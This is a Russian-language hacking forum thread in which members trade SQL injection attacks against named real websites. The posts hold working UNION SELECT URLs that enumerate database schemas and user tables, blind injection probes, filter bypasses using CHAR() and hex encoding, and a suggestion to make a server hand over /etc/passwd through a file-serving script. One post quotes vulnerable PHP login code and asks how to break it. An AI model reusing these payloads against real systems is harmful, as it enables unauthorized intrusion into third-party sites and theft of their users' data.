Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    123
    Likes Received:
    6
    Reputations:
    6
    http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,2,3,4,5+from+informarion_schema.table/*

    бывает и в 4))))))))
     
    1 person likes this.
  2. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    123
    Likes Received:
    6
    Reputations:
    6
    ОЧЕНЬ ДАЖЕ ЗРЯЧАЯ))) только вот limit с union не дружит (как мне помнится) и or/and не льзя использовать.

    Хотелось бы и самому узнать что в таких случаях сделать можно
     
  3. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Не хочу тебя растраивать но не бывает в MySQL 4 ветки INFORMATION.SCEMATA а то что она тебе пишет Access denied совсем не означает что данная бд существует:
    http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,2,3,4,5+from+AkyHa_MaTaTa.My_HeRo/*
    Во всем виноваты подлые гранты если бы не они нам бы прямо в лицо сказали - ни какой ты не HeRo.
     
    #5983 AkyHa_MaTaTa, 18 Mar 2009
    Last edited: 18 Mar 2009
    1 person likes this.
  4. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    123
    Likes Received:
    6
    Reputations:
    6
    2 AkyHa_MaTaTa.My_HeRo

    спс - буду знать

    2 +++AndreyDevil+++
    Я так и не нашел где заливается - может плохо искал. Зато нашел SQL
    http://siovizcenter.ucsd.edu/admin/selectedAnnounce.php?ID=35'/*
    может пригодится
     
  5. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    123
    Likes Received:
    6
    Reputations:
    6
    судя по всему скрипт _getImage.php берет реальный путь к файлу из базы. с помощью sql inj - можно поискать в базе этот путь и обратиться к шеллу напрямую. кроме того как вариант в базу можно ввести libid допустим 55555 и путь к файлу допустим /etc/passw njulf при обращении _getImage.php?libid=55555 будешь качать файл passwd
     
  6. s_p_a_m

    s_p_a_m Elder - Старейшина

    Joined:
    8 Feb 2008
    Messages:
    100
    Likes Received:
    58
    Reputations:
    4
    http://www.zork.name/?view=1%27
     
  7. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    вроде как, файлы хранятся в базе, а не линки.
    http://siovizcenter.ucsd.edu/rq/_getImage.php?libid=-223+union+select+null,111111111,null/*

    прав на mysql.user нет
    file_priv N

    обычная скуля ,с не совсем обычным выводом.

    http://siovizcenter.ucsd.edu/rq/_getImage.php?libid=-223+union+select+null,version(),null/*
    4.1.22-log
     
  8. +++AndreyDevil+++

    Joined:
    28 Dec 2008
    Messages:
    117
    Likes Received:
    30
    Reputations:
    0
    Хоть 5555 ставь хоть 1111 хоть etc/passwd всё равно шелл качает )
     
  9. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    слепая(могу ошибаться, но фантазии не хватает)
    http://www.zork.name/?view=1)+and+substring(version(),1,1)=5--+
     
    #5989 geezer.code, 18 Mar 2009
    Last edited: 18 Mar 2009
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    лимит с ордером не дружит.
     
    _________________________
    1 person likes this.
  11. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Порылся в исходном коде...вот:

    PHP:

    session_set_cookie_params
    (3600);
    session_start();

    if(isset(
    $_SESSION['username']) && strlen($_SESSION['username']) && isset($_SESSION['password']) && strlen($_SESSION['password']))
    {
        
    $s_username $_SESSION['username'];
        
    $s_password $_SESSION['password'];

        include(
    "include/mysql_connect.php");

        
    $result mysql_query("SELECT user_id, level FROM Users WHERE username='$s_username' && password=Password('$s_password')");
        while(
    $row mysql_fetch_array($result))
        {
            
    $userid $row["user_id"];
            
    $s_user_id $row["user_id"];
            
    $s_level $row["level"];
        }
        
    $num mysql_num_rows($result);

        if(
    $num == 0)
        {
            
    header("Location: error2.php");
            exit();
        }
        elseif(
    $num == 1)
        {
            
    $course_id $_REQUEST['course_id'];
            if(!
    is_numeric($course_id))
            {
                
    $course_id 0;
            }
            if(
    $s_level == 0)
            {
                
    $result1 mysql_query("SELECT * FROM Courses_Users WHERE user_id='$s_user_id' && course_id='$course_id'");
                
    $num_c mysql_num_rows($result1);
            }
            if(
    $s_level 0)
            {
                
    $result1 mysql_query("SELECT * FROM Courses WHERE teacher='$s_user_id' && course_id='$course_id'");
                
    $num_c mysql_num_rows($result1);
            }

            
    $num_c mysql_num_rows($result1);

            if(
    $num_c == 0)
            {
                
    header("Location: error2.php");
                exit();
            }
        }
        else
        {
            
    header("Location: index.php");
            exit();
        }
    }
    else
    {
        
    header("Location: index.php");
        exit();
    }
    ?>

    Реально ли здесь провести sql inj ? Проверок нету,разве что на существование.

    И ещё вопросег: там проверка course_id идёт только на то.является ли значение числом...можно ли это обойти ?
     
    #5991 Велемир, 18 Mar 2009
    Last edited: 18 Mar 2009
    1 person likes this.
  12. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Офф имеется...А при mysql_quotes_gpc = On какой был бы вариант ?

    ЗЫ: на этапе $s_username = $_SESSION['username']; можно вместо username подставить запрос?
     
    #5992 Велемир, 18 Mar 2009
    Last edited: 18 Mar 2009
    1 person likes this.
  13. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Почему возникает ошибка при таком запросе?
    Что-то в синтаксисе не так?

    PHP:
    http://www.moviead.com/display.cfm?id=-1+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users'+LIMIT+1,1-- 
     
  14. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Сессия храниться на сервере со всеми данными а пользователь лишь передает ее индетификатор, так что думай

    2Byrger без кавычек
    Unknown column 'users' in 'where clause'
     
    #5994 AkyHa_MaTaTa, 18 Mar 2009
    Last edited: 18 Mar 2009
    1 person likes this.
  15. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    2 Byrger
    А ты кавычки ' замени на "

    http://www.moviead.com/display.cfm?id=-1+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=%22users%22+LIMIT+1,1--

    типа так!
     
  16. sj666

    sj666 New Member

    Joined:
    15 Dec 2008
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Мм, я недавно начал заниматься sql inj поэтому туплю маленько.
    Вот например пытаюсь подобрать кол-во столбцов в db_galery
    http://www.danieldefo.ru/gallery.html?top=1;-- UNION SELECT 1 --
    Ошибки нет, возвращается так же страница =\
     
  17. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    http://www.moviead.com/display.cfm?id=-1+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=CHAR(117,115,101,114,115)+LIMIT+1,1--
     
    1 person likes this.
  18. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    А тут почему не читает? (слепая скуля)
     
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    http://supertractor.ru/index.php?rshow=price&act=viewcat&cid=-1+union+select+1,COLUMN_NAME,3,4+FROM+information_schema.columns+WHERE+table_name=0x6d61696c696e675f61646d696e--
     
  20. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    А где переводить в такую бяку?
     
Thread Status:
Not open for further replies.